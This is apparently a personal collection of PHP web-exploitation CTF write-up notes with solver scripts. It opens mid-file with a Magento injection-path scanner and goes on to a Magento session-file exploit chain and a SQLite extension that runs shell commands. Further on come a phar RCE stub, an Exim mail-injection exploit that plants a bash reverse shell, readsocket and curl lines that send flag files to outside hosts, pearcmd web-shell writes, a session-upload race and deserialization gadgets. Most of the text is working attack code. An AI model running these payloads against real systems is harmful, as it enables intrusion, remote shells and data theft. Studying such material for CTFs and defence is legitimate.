            if dep_norm.endswith("\\Proxy"):
                candidates.append(dep_norm[: -len("\\Proxy")])
            for candidate in candidates:
                for concrete in resolve_concretes(candidate, di_mapping):
                    if concrete not in parents:
                        parents[concrete] = current
                        queue.append(concrete)
    return None
def _parse_method_parameters(
info: ClassInfo, method_name: str
) -> Optional[List[Tuple[str, str]]]:
pattern = re.compile(
rf"function\s+{re.escape(method_name)}\s*\((.*?)\)",
re.IGNORECASE | re.DOTALL,
)
match = pattern.search(info.source)
if not match:
return None
params_str = match.group(1)
params_clean = re.sub(r"#\[[^\]]*\]\s*", "", params_str)
tokens: List[str] = []
current: List[str] = []
depth = 0
for ch in params_clean:
if ch == "," and depth == 0:
token = "".join(current).strip()
if token:
tokens.append(token)
current = []
continue
if ch in ("(", "["):
depth += 1
elif ch in (")", "]"):
depth = max(0, depth - 1)
current.append(ch)
tail = "".join(current).strip()
if tail:
tokens.append(tail)
results: List[Tuple[str, str]] = []
for token in tokens:
token = token.strip()
if not token:
continue
# Strip default assignments.
if "=" in token:
token = token.split("=", 1)[0].strip()
token = re.sub(
r"^(public|protected|private|final|readonly|static)\s+", "", token
)
name_match = re.search(r"\$([A-Za-z_][A-Za-z0-9_]*)", token)
if not name_match:
continue
param_name = name_match.group(1)
parts = token.split()
type_hint = None
for part in parts:
if part.startswith("&"):
continue
if part.startswith("..."):
continue
if part.startswith("$"):
break
type_hint = part
if not type_hint:
continue
resolved = resolve_type(type_hint, info.namespace, info.use_map)
if resolved:
results.append((param_name, resolved))
return results
def extract_method_parameters(class_name: str, method_name: str) -> List[Tuple[str, str]]:
    """Find ``method_name`` on ``class_name`` or the nearest ancestor declaring it.

    Walks up the ``extends`` chain and returns the parameter list from the
    first class whose source declares the method.  Returns an empty list
    when no class in the chain declares it, when a class file cannot be
    loaded, or when the chain loops.
    """
    seen: Set[str] = set()
    candidate: Optional[str] = class_name.lstrip("\\")
    while candidate is not None and candidate not in seen:
        seen.add(candidate)
        info = get_class_info(candidate)
        if not info:
            break
        params = _parse_method_parameters(info, method_name)
        if params is not None:
            return params
        candidate = info.parent.lstrip("\\") if info.parent else None
    return []
def load_webapi_sources() -> List[Endpoint]:
    """Collect the anonymously accessible routes from the listed XML files.

    WEBAPIS_LIST_PATH names one XML file per line (relative to SCRIPT_DIR);
    blank lines, ``#`` lines and missing or malformed files are skipped.
    A ``<route>`` is kept when it has a ``<resource ref="anonymous">`` directly
    under its ``<resources>`` element and its ``<service>`` names both a class
    and a method other than ``DEFAULT``.  Returns an empty list when the list
    file does not exist.
    """
    anonymous: List[Endpoint] = []
    if not os.path.exists(WEBAPIS_LIST_PATH):
        return anonymous

    with open(WEBAPIS_LIST_PATH, "r", encoding="utf-8") as listing:
        for raw in listing:
            entry = raw.strip()
            if not entry or entry.startswith("#"):
                continue
            xml_path = os.path.normpath(os.path.join(SCRIPT_DIR, entry))
            if not os.path.isfile(xml_path):
                continue
            try:
                document = ET.parse(xml_path)
            except ET.ParseError:
                continue

            for route in document.getroot().findall(".//route"):
                service = route.find("service")
                resources = route.find("resources")
                if service is None or resources is None:
                    continue
                refs = [res.attrib.get("ref") for res in resources.findall("resource")]
                if "anonymous" not in refs:
                    continue
                service_class = service.attrib.get("class")
                service_method = service.attrib.get("method")
                if service_class and service_method and service_method != "DEFAULT":
                    anonymous.append(
                        Endpoint(
                            url=route.attrib.get("url", ""),
                            http_method=route.attrib.get("method", ""),
                            service_class=service_class.lstrip("\\"),
                            service_method=service_method,
                        )
                    )
    return anonymous
def main() -> int:
    """Print every constructor-injection path from an anonymous API to the sink.

    For each anonymous endpoint, every class-typed parameter of the service
    method is resolved to its concrete class and searched for a constructor
    dependency path to TARGET_CLASS.  Endpoints with at least one path are
    printed, sorted by HTTP method, URL, service class and service method.
    Always returns 0.
    """
    di_mapping = load_di_mapping()
    endpoints = load_webapi_sources()
    if not endpoints:
        print("No anonymous web API endpoints detected; nothing to scan.")
        return 0

    hits: List[Tuple[Endpoint, List[List[str]]]] = []
    for endpoint in endpoints:
        chains: List[List[str]] = []
        recorded: Set[Tuple[str, ...]] = set()
        for service in resolve_concretes(endpoint.service_class, di_mapping):
            for param_name, param_type in extract_method_parameters(
                service, endpoint.service_method
            ):
                for implementation in resolve_concretes(param_type, di_mapping):
                    path = find_constructor_path(implementation, di_mapping)
                    if not path:
                        continue
                    # Start with the parameter itself; show the concrete class
                    # separately only when it differs from the declared type.
                    chain: List[str] = [f"${param_name}: {param_type}"]
                    if path[0] != param_type:
                        chain.append(path[0])
                    chain += path[1:]
                    fingerprint = tuple(chain)
                    if fingerprint in recorded:
                        continue
                    recorded.add(fingerprint)
                    chains.append(chain)
        if chains:
            hits.append((endpoint, chains))

    if not hits:
        print(
            "No anonymous web API services reach Magento\\Framework\\Url via constructor injection."
        )
        return 0

    def ordering(hit):
        route = hit[0]
        return (route.http_method, route.url, route.service_class, route.service_method)

    hits.sort(key=ordering)

    for endpoint, paths in hits:
        print(
            f"{endpoint.http_method} {endpoint.url} :: "
            f"{endpoint.service_class}::{endpoint.service_method}"
        )
        for idx, chain in enumerate(paths, 1):
            print(f" Path {idx}:")
            for node in chain:
                print(f" -> {node}")
        print()
    return 0


if __name__ == "__main__":
    sys.exit(main())
在所有路径中找了一条最短的路径,移除涉及payment类的路径,如下
POST /V1/guest-carts/:cartId/billing-address :: Magento\Quote\Api\GuestBillingAddressManagementInterface::assign
Path 1:
-> $address: Magento\Quote\Api\Data\AddressInterface
-> Magento\Quote\Model\Quote\Address
-> Magento\Directory\Helper\Data
-> Magento\Framework\App\Helper\Context
-> Magento\Backend\Model\Url
-> Magento\Framework\Url
不难将这个指定session file的漏洞和已知文件上传漏洞串联起来,利用脚本如下
import os
import secrets
import string

import requests

# Two-step exploit:
#   1. upload a crafted session file through the customer address upload;
#   2. call the guest billing-address API with a nested payload that sets the
#      session save path to the upload directory, with PHPSESSID naming the
#      uploaded file.

target = 'http://60.205.163.215:32640'

# Random tokens are generated in-process instead of shelling out to
# `cat /dev/urandom | tr ...`, which needed a POSIX shell and spawned a
# pipeline per token.  Lengths and alphabets are unchanged.
FORMKEY = "".join(secrets.choice(string.ascii_letters + string.digits) for _ in range(16))
SESSID = "".join(secrets.choice(string.ascii_lowercase + string.digits) for _ in range(26))
print(f"[+] Using form_key: {FORMKEY}")
print(f"[+] Using session_id: {SESSID}")

# docker run --rm -v .:/mnt phpgc -se -pub -a Guzzle/FW1 /proc/self/cwd/index.php /mnt/payload.php > exp.sess
url = f"{target}/customer/address_file/upload"
data = {
    'form_key': FORMKEY,
}
cookies = {
    'form_key': FORMKEY,
}
# The payload file is closed as soon as the upload request returns.
with open('exp.sess', 'rb') as payload:
    files = {
        'custom_attributes[country_id]': (f'sess_{SESSID}', payload, 'application/octet-stream'),
    }
    response = requests.post(url, files=files, data=data, cookies=cookies)
print(response.text)

url = f"{target}/rest/default/V1/guest-carts/abc/billing-address"
# The nesting follows the constructor-parameter path from the address object
# down to the session configuration.
data = {
    "address": {
        "directoryData": {
            "context": {
                "urlBuilder": {
                    "session": {
                        "sessionConfig": {
                            "savePath": "media/customer_address/s/e"
                        }
                    }
                }
            }
        }
    }
}
response = requests.post(url, json=data, cookies={'PHPSESSID': SESSID})
print(response.text)
PHP Sandbox bypass using PDO SQLite
| Event Name | XCTF 2025 |
| GitHub URL | - |
| Challenge Name | i forgot the challenge name |
Attachments
References
tl;dr about the challenge
solution
import httpx
import asyncio
import subprocess
import base64
import os
URL = "http://localhost:12345/"


class BaseAPI:
    """Thin async HTTP client for the target's ``eval`` endpoint."""

    def __init__(self, url=URL) -> None:
        """Create the underlying httpx client bound to ``url``."""
        self.c = httpx.AsyncClient(base_url=url, timeout=10000)

    async def eval(self, code: str) -> "httpx.Response":
        """Send ``code`` as the ``eval`` query parameter of ``GET /``.

        Must be awaited.  Returns the HTTP response; callers read ``.text``.
        The previous ``-> str`` annotation was wrong: the method handed back
        the un-awaited request coroutine, never a string.
        """
        return await self.c.get(
            "/",
            params={"eval": code}
        )
class API(BaseAPI):
    """Client used by the exploit; currently adds nothing to BaseAPI."""
    ...
async def upload_base64_file(api: BaseAPI, b64_content: str, remote_path: str, chunk_size: int = 4000):
    """Write a base64 payload to ``remote_path`` on the target via PHP eval.

    The text is sent in chunks to ``remote_path + '.b64'`` (first chunk
    overwrites, later chunks append), then decoded remotely into
    ``remote_path`` in one step.  ``chunk_size`` is rounded down to a
    multiple of 4 (minimum 4).  The decode request's response text is
    printed.
    """
    remainder = chunk_size % 4
    if remainder != 0:
        chunk_size -= remainder
    if chunk_size <= 0:
        chunk_size = 4

    staging_path = remote_path + '.b64'
    write_template = "file_put_contents('%s','%s');echo 'ok';"
    append_template = "file_put_contents('%s','%s',FILE_APPEND);echo 'ok';"

    for offset in range(0, len(b64_content), chunk_size):
        # Only the very first chunk truncates the staging file.
        template = write_template if offset == 0 else append_template
        piece = b64_content[offset:offset + chunk_size]
        reply = await api.eval(template % (staging_path, piece))
        _ = reply.text

    decode_php = """
$b64 = file_get_contents('%s');
file_put_contents('%s', base64_decode($b64));
clearstatcache();
$s = @filesize('%s');
var_dump($s !== false ? ('size=' . $s) : 'size_error');
""" % (staging_path, remote_path, remote_path)
    decode = await api.eval(decode_php)
    print(decode.text.strip())
def build_shared_object():
    """Compile the SQLite extension and return it base64-encoded.

    Writes ``hello.c`` when it does not already exist, compiles it with gcc
    into ``libhello_fd.so`` and returns the library's bytes as a base64
    string.  Returns None when gcc is missing, compilation fails or the
    library cannot be read.

    Cleanup runs on every exit path: the compiled library is always removed,
    and ``hello.c`` is removed only when this call created it.  Previously a
    failed compilation left the files behind, a pre-existing ``hello.c`` was
    deleted, and a missing file could raise from the cleanup itself.
    """
    c_file = "hello.c"
    so_file = "libhello_fd.so"
    created_source = False

    try:
        # Create the C source if it doesn't exist
        if not os.path.exists(c_file):
            # exec_function's fallback message lives in a stack buffer, so it
            # is returned with SQLITE_TRANSIENT (SQLite copies it).  It used
            # SQLITE_STATIC, which leaves SQLite holding a dangling pointer.
            c_source = '''#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <sqlite3ext.h>
SQLITE_EXTENSION_INIT1
// Simple function that prints "Hello from shared object!"
static void hello_function(sqlite3_context *context, int argc, sqlite3_value **argv) {
sqlite3_result_text(context, "Hello from shared object!", -1, SQLITE_STATIC);
}
// Function to execute system commands and return output
static void exec_function(sqlite3_context *context, int argc, sqlite3_value **argv) {
if (argc < 1) {
sqlite3_result_error(context, "exec_function requires one argument", -1);
return;
}
const char *command = (const char*)sqlite3_value_text(argv[0]);
if (command == NULL) {
sqlite3_result_error(context, "exec_function: invalid command", -1);
return;
}
// Execute command and capture output
FILE *fp = popen(command, "r");
if (fp == NULL) {
sqlite3_result_error(context, "Failed to execute command", -1);
return;
}
char buffer[4096];
char output[8192] = "";
while (fgets(buffer, sizeof(buffer), fp) != NULL) {
strncat(output, buffer, sizeof(output) - strlen(output) - 1);
}
int exit_code = pclose(fp);
// If we got output, return it; otherwise return exit code info
if (strlen(output) > 0) {
sqlite3_result_text(context, output, -1, SQLITE_TRANSIENT);
} else {
char result_str[128];
snprintf(result_str, sizeof(result_str), "Command executed with exit code: %d", exit_code);
sqlite3_result_text(context, result_str, -1, SQLITE_TRANSIENT);
}
}
// Extension entry point
int sqlite3_hellofd_init(sqlite3 *db, char **pzErrMsg, const sqlite3_api_routines *pApi) {
SQLITE_EXTENSION_INIT2(pApi);
// Register our custom functions
sqlite3_create_function(db, "hello", 0, SQLITE_UTF8, 0, hello_function, 0, 0);
sqlite3_create_function(db, "exec_cmd", 1, SQLITE_UTF8, 0, exec_function, 0, 0);
return SQLITE_OK;
}'''
            with open(c_file, 'w') as f:
                f.write(c_source)
            created_source = True
            print(f"Created {c_file}")

        # Compile the shared object
        compile_cmd = [
            "gcc",
            "-shared",
            "-fPIC",
            "-o", so_file,
            c_file,
            "-lsqlite3"
        ]
        try:
            print(f"Compiling {c_file} into {so_file}...")
            subprocess.run(compile_cmd, check=True, capture_output=True, text=True)
            print(f"Successfully compiled {so_file}")
        except subprocess.CalledProcessError as e:
            print(f"Compilation failed: {e}")
            print(f"Error output: {e.stderr}")
            return None
        except FileNotFoundError:
            print("Error: gcc not found. Please install gcc to compile the shared object.")
            return None

        # Read and encode the shared object
        try:
            with open(so_file, 'rb') as f:
                so_content = f.read()
        except OSError as e:
            print(f"Error reading {so_file}: {e}")
            return None
        return base64.b64encode(so_content).decode()
    finally:
        leftovers = [so_file]
        if created_source:
            leftovers.append(c_file)
        for leftover in leftovers:
            try:
                os.remove(leftover)
            except FileNotFoundError:
                # Nothing to clean up, e.g. gcc never produced the library.
                pass
async def main():
    """Build the extension locally, upload it, then load and exercise it remotely.

    Stops early when the local build fails.  The PHP snippet sent at the end
    loads ``/tmp/libhello_fd.so`` through ``Pdo\\Sqlite::loadExtension`` and
    calls the two SQL functions the extension registers.
    """
    api = API()
    print("=== Building Shared Object ===")
    # Build the shared object
    payload_content = build_shared_object()
    if not payload_content:
        print("Failed to build shared object!")
        return
    print(f"Base64 content length: {len(payload_content)} characters")
    print("=== Uploading and Executing ===")
    # Upload the shared object in chunks to avoid 414
    print("Uploading shared object in chunks...")
    await upload_base64_file(api, payload_content, '/tmp/libhello_fd.so', chunk_size=4000)
    # Load and test the extension
    print("Loading extension and testing...")
    res = await api.eval(r"""
error_reporting(-1);
try {
$db = new Pdo\Sqlite('sqlite::memory:');
$db->loadExtension('/tmp/libhello_fd.so');
var_dump("Extension loaded successfully");
// Test our custom functions
$result = $db->query("SELECT hello()")->fetchColumn();
var_dump("hello() result: " . $result);
// Test exec function with different commands
$commands = [
'cat /flag.txt',
];
foreach ($commands as $cmd) {
$exec_result = $db->query("SELECT exec_cmd('" . $cmd . "')")->fetchColumn();
var_dump("exec_cmd('" . $cmd . "'): " . $exec_result);
}
} catch (Throwable $e) {
var_dump("Error: " . $e->getMessage());
}
""")
    print(res.text)
if __name__ == "__main__":
asyncio.run(main())
Php trick
| Event Name | Line CTF 2025 |
| GitHub URL | - |
| Challenge Name | Restricted Proxy |
Attachments
References
solve
import httpx
import asyncio
from urllib.parse import quote
URL = "http://136.110.79.68:10002"
URL = "http://localhost:10002"
class BaseAPI:
def __init__(self, url=URL) -> None:
self.c = httpx.AsyncClient(base_url=url)
def home_post(self, data):
return self.c.post("/", data=data, headers={"Content-Type": "application/x-www-form-urlencoded"})
class API(BaseAPI):
...
async def main():
    """Send the crafted form body to the proxy and print the response."""
    api = API()
    q = quote(r"flag?cmd=(f)&fmt={0:[w:=iter(w)]}")
    print(q)
    # The field separator before "params" had been mangled into the pilcrow
    # character ("&para" decoded as an HTML entity); it must be "&params=".
    body = (
        "submit=1&host=nginx&path=get%0a&params=" + q
        + "&token_header=:X-From-Restric&token=ted-Proxy:8007370437"
    )
    res = await api.home_post(body)
    print(res.text)
if __name__ == "__main__":
asyncio.run(main())
Phar is still exploitable in PHP 8 when it is reached via include(…); the phar can also be gzipped (e.g. payload.phar.gz) and will still work
| Event Name | DEADSEC 2025 |
| GitHub URL | - |
| Challenge Name | baby-web |
Attachments
References
<?php
$phar = new Phar('exploit.phar');
$phar->startBuffering();
$stub = <<<'STUB'
<?php
system('/readflag');
__HALT_COMPILER();
?>
STUB;
$phar->setStub($stub);
$phar->addFromString('dummy.txt', 'dummy');
$phar->stopBuffering();
?>
Gzip the payload, upload it, then include it with /index.php?url=payload.phar.gz
PHP Mailer CVE 2016 with EXIM4
| Event Name | IERAE CTF 2025 |
| GitHub URL | - |
| Challenge Name | CokePHP |
References
GET /debug/<@urlencode_all><@urlencode_all>Debug/var/www/src/modules/debug.php:5$0</@urlencode_all></@urlencode_all>/phpinfo/CONFIG_CONFIG_module_namespace/<@urlencode_all>%00<@urlencode_all>App\Modules</@urlencode_all></@urlencode_all> HTTP/1.1
PHP Mailer CVE 2016 with EXIM4
| Event Name | Midnight Sun CTF 2025 Quals |
| GitHub URL | - |
| Challenge Name | UselessCorp |
Attachments
References
solve 1
Here's the script I used for ACE on uselesscorp:
import requests
import base64
# Address and port of the listener that the command written to /tmp/a connects back to.
REV_SHELL_IP = '10.20.30.40'
REV_SHELL_PORT = 1337
# Base URL of the target.  No trailing slash: requests are sent to HOST + '/index.php'.
HOST = 'http://localhost'
# HOST = 'https://useless-94tszh4z.ctf.pro'
sess = requests.Session()
def send_mail(email: str):
data = {
'name': 'a',
'email': email,
'subject': 'cool',
'message': 'Important message',
'submit': 'submit',
}
print(f'Sending {email = }')
sess.post(HOST + '/index.php', data=data)
def run_cmd(cmd: str):
exploit = '${run,preexpand{${base64d:' + base64.b64encode(cmd.encode()).decode() + '}}}'
send_mail('"a\\\\" -be ' + exploit + ' "@a')
# Delete /tmp/a first in case it exists. Convenience, because we're appending later
run_cmd("/bin/rm /tmp/a")
# Then write our target command to `/tmp/a` one char at a time:
TARGET_CMD = f"""
/bin/bash -i >& /dev/tcp/{REV_SHELL_IP}/{REV_SHELL_PORT} 0>&1
""".strip()
assert "'" not in TARGET_CMD and '"' not in TARGET_CMD
for c in TARGET_CMD:
run_cmd(f'''/bin/sh -c "echo -n '{c}'>>/tmp/a"''')
# Now we execute the file we've written
run_cmd("/bin/bash /tmp/a")
# And clean up at the end
run_cmd("/bin/rm /tmp/a")
solve 2
curl -X POST https://useless-94tszh4z.ctf.pro -d 'name=a' -d 'subject=a' -d 'message=a' -d 'submit=submit' -d 'email="\" -be ${readsocket{inet:0.tcp.ap.ngrok.io:19066}{${readfile{/flag.txt}}}} "@x'
solve 3
TLDR writeup for Uselesscorp
/includes from the style cssclass.phpmailer.phpbe${readsockets{message_here}} with ngrok- It does work!
${readfile{/flag.txt}} to get flag content${readsocket{inet:ngrok.url.here:ngrok.port}{${readfile{/flag.txt}}}}
peclcmd.php to get code execution, with and without writing a file
| Event Name | SEETF 2023 |
| GitHub URL | https://github.com/zeyu2001/My-CTF-Challenges/tree/main/SEETF-2023/readonly https://hackmd.io/@Solderet/AngstromCTF2023#Filestore---Web |
| Challenge Name | readonly |
Without writing a file
GET /?page=../usr/local/lib/php/peclcmd.php&+run-tests+-i+-r"system(hex2bin('PAYLOAD'));"+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt HTTP/1.1
GET /?page=../usr/local/lib/php/peclcmd.php&+run-tests+-i+-r`sleep$\{IFS\}5`+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt HTTP/1.1
../../../../../../../../../../usr/local/lib/php/peclcmd
+run-tests+-i+-r`sleep${IFS}5`+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt
../../../../../../../../../../usr/local/lib/php/peclcmd&x=+run-tests+-i+-r`sleep${IFS}5`+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt
With writing a file
curl "https://filestore.web.actf.co/?f=../../../../usr/local/lib/php/pearcmd.php&+-c+/tmp/foo.php+-d+man_dir=><?echo(system(\\$_GET\\['a'\\]));?>+-s+"
curl "http://172.26.119.33:9100/wp-content/plugins/kiwiblocks/src/admin-panel/views/panel.php?tab=../../../../../../../../../../usr/local/lib/php/peclcmd.php&+run-tests+-i+-r\"system(hex2bin('$(echo "curl 77.37.47.226:4444 -d \"`cat /*`\"" | hexdump -v -e '/1 "%02x"' | tr -d '\n')'));\"+/usr/local/lib/php/test/Console_Getopt/tests/bug11068.phpt"
PHP Extract + Dompdf Options
| Event Name | Cyber Jawara National 2024 |
| GitHub URL | - |
| Challenge Name | Name Card |
Attachments
data%5Bname%5D=a&data%5BphotoUrl%5D=https://letsenhance.io/static/73136da51c245e80edc6ccfe44888a99/1015f/MainBefore.jpg<?=system('ls');?>&data%5Bemail%5D=aa%40mail.com&data%5Bphone%5D=08111111111111&data%5Baddress%5D=aaaaaaaaaaaa&data[config][isRemoteEnabled]=1&data[config][logOutputFile]=/var/www/html/log.php&data[config][debugPng]=1&data[config][debugCss]=1
Case insensitive function call
| Event Name | Patchstack Alliance CTF S02E01 - WordCamp Asia |
| GitHub URL | - |
| Challenge Name | Cool Templates |
Attachments
References
We can call PHP functions case-insensitively. For example, System() will be treated as system().
php filter bypass
Filter Madness - web
Based on the provided images, here is the exact text contained within them:
Image 1 (image_c7e677.png)
Input
Plaintext
resource=data:,14
zombies for the flag
0
|dechunk
Output
Plaintext
resource=data:,14%0Azombies%20for%20the%20flag%0A0%0A%7Cdechunk
Image 2 (image_c7e559.png)
Browser URL Bar
Plaintext
https://filter-madness-tlejfksioa-ul.a.run.app/?madness=resource=data:,14%0Azombies%20for%20the%20flag%0A0%0A%7Cdechunk
Page Content
Plaintext
Warning: file_get_contents(): Unable to locate filter "resource=data:,14 zombies for the flag 0 " in /var/www/html/index.php on line 11
Warning: file_get_contents(): Unable to create filter (resource=data:,14 zombies for the flag 0 ) in /var/www/html/index.php on line 11
Warning: file_get_contents(): Unable to locate filter "resource=" in /var/www/html/index.php on line 11
Warning: file_get_contents(): Unable to create filter (resource=) in /var/www/html/index.php on line 11
Warning: file_get_contents(): Unable to locate filter "etc" in /var/www/html/index.php on line 11
Warning: file_get_contents(): Unable to create filter (etc) in /var/www/html/index.php on line 11
Warning: file_get_contents(): Unable to locate filter "passwd" in /var/www/html/index.php on line 11
Warning: file_get_contents(): Unable to create filter (passwd) in /var/www/html/index.php on line 11
Can you submit some madness that will return the flag?
Your filter madness: php://filter/resource=data:,14 zombies for the flag 0 |dechunk/resource=/etc/passwd
Your filter madness length: 83
Your filter madness results: wctf{m4y6e-th15-15-4-6u9-1n-php-83047}
Bypass exit in PHP: PHP file upload when we can manipulate the start of the file_put_contents filename, which makes it possible to use a PHP filter chain
| Event Name | Patchstack Alliance CTF S02E01 - WordCamp Asia |
| GitHub URL | - |
| Challenge Name | Blocked |
Attachments
References
$write = <<<EOF
<?php
exit('ha?');
// $content
EOF;
file_put_contents($name . '.php', $write);
It’s possible to gain RCE in this kind of code if we can manipulate $name: we can use a PHP filter chain.
imagepng is one of many functions whose output we can manipulate with a PHP filter chain if we control the start of the filename
| Event Name | Patchstack Alliance CTF S02E01 - WordCamp Asia |
| GitHub URL | - |
| Challenge Name | Sneaky |
Attachments
References
LessPHP 0day version "wikimedia/less.php": "5.2.1", if we can control the SetImportDirs
| Event Name | PWNME CTF Quals 2025 |
| GitHub URL | https://github.com/Phreaks-2600/PwnMeCTF-2025-quals/blob/main/Web/Pwnshop/solve/README.md |
| Challenge Name | Pwnshop |
Attachments
References
if (file_exists($customLessPath)) {
$customLess = file_get_contents($customLessPath);
$parser = new \Less_Parser();
$importDirs = $this->getImportDirectories();
$parser->SetImportDirs($importDirs);
$parser->parse($customLess);
$customCSS = $parser->getCss();
$css .= "\n/* Custom CSS */\n" . $customCSS;
}
PHP SESSION UPLOAD PROGRESS SESSION FILE WRITE
https://book.hacktricks.xyz/pentesting-web/file-inclusion/via-php_session_upload_progress
This does not work if a suffix is appended to the included path, for example require $path.".php"
solver
import httpx
import asyncio
URL = "http://localhost"
CMD = "dir"
# change to php session location, eg: /var/lib/php/sessions or /tmp or /xampp/tmp
SESSION_LOCATION = "/xampp/tmp"
SESSION_NAME = "sebastian"
FILE_SIZE = 1_000_000
REQUEST_NUM = 100
class BaseAPI:
    """Thin async HTTP client for the target site."""

    def __init__(self, url=URL) -> None:
        self.c = httpx.AsyncClient(base_url=url, timeout=999)

    def lfi(self, file, cmd):
        """Request the inclusion of ``file`` through the ``template`` parameter.

        Args:
            file: Absolute path of the file to include (appended after the
                ``../`` traversal prefix).
            cmd: Value forwarded as the ``cmd`` query parameter.

        Returns:
            The un-awaited coroutine produced by ``AsyncClient.post``.
        """
        # The path previously ignored ``file`` and always pointed at the bare
        # session directory, so the session file itself was never included.
        return self.c.post(
            "/wp-admin/admin-ajax.php"
            "?action=nopriv_geo_mashup_query&object_ids=1&object_name="
            f"&template=../../../../../../../../../..{file}&cmd={cmd}"
        )
class API(BaseAPI):
async def upload_shell(self):
payload='success<?php system($_GET["cmd"])?>'
res = await self.c.post("/", files={"f": ("foo", "A"*FILE_SIZE)}, data={
'PHP_SESSION_UPLOAD_PROGRESS': payload
}, headers = {
'Cookie': 'PHPSESSID='+SESSION_NAME
})
return res
async def main():
    """Race uploads against inclusions until a response contains "success".

    Each round fires REQUEST_NUM upload requests and REQUEST_NUM inclusion
    requests concurrently, then scans the responses in submission order and
    prints the first one containing the marker.
    """
    uploader = API()
    includer = API()
    session_file = SESSION_LOCATION + "/sess_" + SESSION_NAME
    while True:
        # Uploads are queued first, inclusions second.
        pool = [uploader.upload_shell() for _ in range(REQUEST_NUM)]
        pool += [includer.lfi(session_file, CMD) for _ in range(REQUEST_NUM)]
        for res in await asyncio.gather(*pool):
            if "success" in res.text:
                print(res.text)
                return
if __name__ == "__main__":
asyncio.run(main())
RCE via HTML Template Injection in require()
If there is an HTML injection plus a require gadget, we can use the injection to gain RCE by brute-forcing the file descriptor that renders the injected HTML
PHP Reflection class
Unsecure (TCP1P CTF 2023)
<?php
// Builds the Echoers -> Adders -> Vuln object chain and prints it
// serialized and base64-encoded.
include 'GadgetOne/Adders.php';
include 'GadgetTwo/Echoers.php';
include 'GadgetThree/Vuln.php';

use GadgetOne\Adders;
use GadgetTwo\Echoers;
use GadgetThree\Vuln;

/* Gadget Three */
$vuln = new Vuln();
$vuln->waf1 = 1;
// waf2 is set through reflection (presumably because it is not public).
$reflection2 = new \ReflectionProperty(get_class($vuln), 'waf2');
$reflection2->setAccessible(true);
$reflection2->setValue($vuln, "\xde\xad\xbe\xef");
# $vuln->cmd = "system('ls -alh');";
$vuln->cmd = "system('cat 182939124819238912571292389218129123.txt');echo '\n';";

/* Gadget One */
$adder = new Adders($vuln);

/* Gadget Two */
$echoers = new Echoers();
// klass is likewise assigned through reflection.
$reflection3 = new \ReflectionProperty(get_class($echoers), 'klass');
$reflection3->setAccessible(true);
$reflection3->setValue($echoers, $adder);

$serialized = serialize($echoers);
echo base64_encode($serialized);
echo "\n\n";
Bypassing PHP openssl_decrypt mode aes-128-gcm authentication using one byte $tag technique (TSGCTF2023) (DANCE)
<?php
// Demo: encrypt "guest" with aes-128-gcm, XOR the ciphertext so that it
// decrypts to "admin", then brute-force a one-byte authentication tag that
// openssl_decrypt accepts for the tampered ciphertext.
$auth = "guest";
$cipher = "aes-128-gcm";
$key = "asdkwosqdiwq";
$iv = "qwinviwjeqwoqw";
$encrypted_auth = openssl_encrypt($auth, $cipher, $key, 0, $iv, $tag);
echo "guest enc";
var_dump($encrypted_auth);
// XOR out the known plaintext "guest" and XOR in "admin".
$decoded = base64_encode((base64_decode($encrypted_auth) ^ "guest") ^ "admin");
echo "Admin tamper enc ";
var_dump($decoded);
echo "tag before ";
var_dump($tag);
// Try every possible single-byte tag, 0x00 through 0xFF inclusive.
for ($i = 0; $i < 256; $i++) {
    $tag = chr($i);
    $decrypted = openssl_decrypt($decoded, $cipher, $key, 0, $iv, $tag);
    // openssl_decrypt returns false when the tag is rejected.
    if ($decrypted !== false) {
        echo "tag matched ";
        var_dump($tag);
        echo "decode our tampered admin cookie ";
        var_dump($decrypted);
    }
}
https://hackmd.io/@Ud2Y6umGS0e2DCVusYcQ3w/r15gGTNXa
Dari writeup di atas kita bisa simpulkan bahwa kita bisa men-tamper $tag-nya dengan menebak byte pertama saja. Ini dikarenakan fungsi openssl_decrypt di PHP tidak melakukan pengecekan length dari $tag, sehingga kita bisa memberi 1 byte ke openssl_decrypt dan membuat openssl_decrypt hanya me-matching 1 byte dari original $tag.
Int trim in PHP
php > echo (int) "12asd";
12
Maybe unserialize
jadi klo make func maybe_unserialize itu pasti bakalan nge-serialize lagi dari input yang formatnya udah serialized. misal nginput object, ntar bakalan di serialized lagi jadi string
nah, menariknya.. ini bisa dilewati dengan cara ga make ; atau } ntar tetep jadi object. Cuma menariknya lagiii, kalau make fungsi unserialize itu tetep bisa nge-unserialize serialized yang ga complete (missing ; atau })
ex:
<?php
class Flag
{
private $msg;
public function __wakeup(): void
{
require "flag.php";
$this->msg = $flag;
$this->printFlag();
}
public function printFlag()
{
print($this->msg);
}
}
function maybe_serialize($data)
{
if (is_array($data) || is_object($data)) {
return serialize($data);
}
if (is_serialized($data, false)) {
return serialize($data);
}
return $data;
}
function is_serialized($data, $strict = true)
{
// If it isn't a string, it isn't serialized.
if (!is_string($data)) {
return false;
}
$data = trim($data);
if ('N;' === $data) {
return true;
}
if (strlen($data) < 4) {
return false;
}
if (':' !== $data[1]) {
return false;
}
if ($strict) {
$lastc = substr($data, -1);
if (';' !== $lastc && '}' !== $lastc) {
return false;
}
} else {
$semicolon = strpos($data, ';');
$brace = strpos($data, '}');
var_dump($data);
var_dump($semicolon.$brace);
// Either ; or } must exist.
if (false === $semicolon && false === $brace) {
return false;
}
// But neither must be in the first X characters.
if (false !== $semicolon && $semicolon < 3) {
return false;
}
if (false !== $brace && $brace < 4) {
return false;
}
}
$token = $data[0];
switch ($token) {
case 's':
if ($strict) {
if ('"' !== substr($data, -2, 1)) {
return false;
}
} elseif (!str_contains($data, '"')) {
return false;
}
// Or else fall through.
case 'a':
case 'O':
case 'E':
return (bool) preg_match("/^{$token}:[0-9]+:/s", $data);
case 'b':
case 'i':
case 'd':
$end = $strict ? '$' : '';
return (bool) preg_match("/^{$token}:[0-9.E+-]+;$end/", $data);
}
return false;
}
// $user_input = serialize(new Flag());
// Serialized Flag object with the closing "}" left off on purpose.
$user_input = "O:4:\"Flag\":0:{";
$serialized_result = maybe_serialize($user_input);
// Show the raw input, then what maybe_serialize() returned and how
// unserialize() treats that result.
var_dump(json_encode($user_input));
var_dump($user_input);
var_dump($serialized_result);
var_dump(unserialize($serialized_result));
// var_dump(unserialize($user_input));
Change root directory
In PHP we can change the root directory using chroot().
